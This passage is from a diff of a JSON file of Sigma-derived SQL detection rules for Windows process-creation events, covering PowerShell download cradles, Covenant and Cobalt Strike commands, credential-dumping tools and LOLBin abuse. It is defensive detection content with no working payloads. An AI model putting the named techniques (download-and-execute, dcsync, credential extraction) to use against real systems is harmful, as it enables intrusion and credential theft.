AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\code.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", - "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "PowerShell Script Run in AppData", + "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "status": "experimental", + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" }, { - "title": "PUA - Potential PE Metadata Tamper Using Rcedit", - "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", - "author": "Micah Babinski", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036", - "attack.t1027.005", - "attack.t1027" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate use of the tool by administrators or users to update metadata of a binary" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_rcedit_execution.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\')) AND NOT ((NewProcessName = '') OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName IN ('-', '')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%.scr' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "status": "test", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate setups that use similar flags" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", - "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "status": "experimental", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.t1007" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unknown" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_query_registry.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Suspicious Rundll32 Invoking Inline VBScript", - "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1055" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001", + "attack.t1564.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_inline_vbs.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", - "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "status": "test", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", - "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "status": "experimental", + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", - "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "title": "Arbitrary Binary Execution Using GUP Utility", + "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", "status": "experimental", - "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", - "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.execution" ], "falsepositives": [ - "DataSvcUtil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Other parent binaries using GUP not currently identified" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\gup.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" ], - "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Suspicious CodePage Switch Via CHCP", + "id": "c7942406-33dd-4377-a564-0f62db0593a3", + "status": "test", + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.t1036", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Administrative activity (adjust code pages according to your organization's region)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_chcp_codepage_switch.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "WmiPrvSE Spawned A Process", - "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", - "status": "stable", - "description": "Detects wmiprvse spawning processes", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Active Directory Database Snapshot Via ADExplorer", + "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "status": "experimental", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((SubjectLogonId IN ('0x3e7', 'null') OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\')) OR (SubjectLogonId = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmiprvse_spawning_process.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", + "title": "Suspicious Execution of Powershell with Base64", + "id": "fb843269-508c-4b76-8b8d-88679db22ce7", "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Commandline to launch powershell with a base64 payload", + "author": "frack113", "tags": [ - "attack.command_and_control", "attack.execution", - "attack.t1218" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE 